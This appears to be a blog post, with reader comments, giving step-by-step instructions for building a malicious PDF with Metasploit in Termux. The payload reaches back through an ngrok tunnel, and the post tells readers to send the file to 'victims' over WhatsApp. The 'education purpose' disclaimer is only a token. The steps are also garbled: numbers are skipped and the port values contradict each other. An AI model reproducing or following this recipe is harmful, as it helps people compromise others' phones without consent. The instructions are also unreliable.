1.ngrok for WAN attacks
2.metasploit (pre-installed)
metasploit payload bind in PDF file
1.cd metasploit-framework
2. ./msfconsole (wait for few minutes)


4.cd metasploit-framework
5.cd modules
6.cd exploits
7.cd android
8.cd fileformat
9. now copy this file name you need this format for next step adobe_reader_pdf_js_interface.rb
10.back to the first terminal

12.now open an other terminal window ./ngrok tcp 1649

13.now copy the link "0.tcp.ngrok.io" that's are lhost for WAN but dh not copy my link you get an other link in ngrok
14. now back to the first window set lhost 0.tcp.ngrok.io
15. now copy port /0.tcp.ngrok 19238 you will get another port number...
16.set lport 15836

17.exploit
18 copy this /data/data/com.termux/files/home/.msf4/local/msf.pdf /sdcard your payload will be save in your internal mobile storage.. now send it to the victims mobile via whatsapp.. I'm not responsible for any misuse of this script.. only use for education purpose..
hi. good contribution
ReplyDeletePayload was created but how can I listen to that payload please help.
ReplyDeleteIs it need root permission
ReplyDeleteI cant move it into storage
How do I start a session for looking into phone
ReplyDeleteThat msf.pdf not located in the root as mentioned above
ReplyDeletevery nice artical
ReplyDeleteplease visit my blog
https://kidscricketcoaching.blogspot.com/2020/05/episode-16-back-foot-drive-29052020.html
Post a Comment
if you have doubts let me know...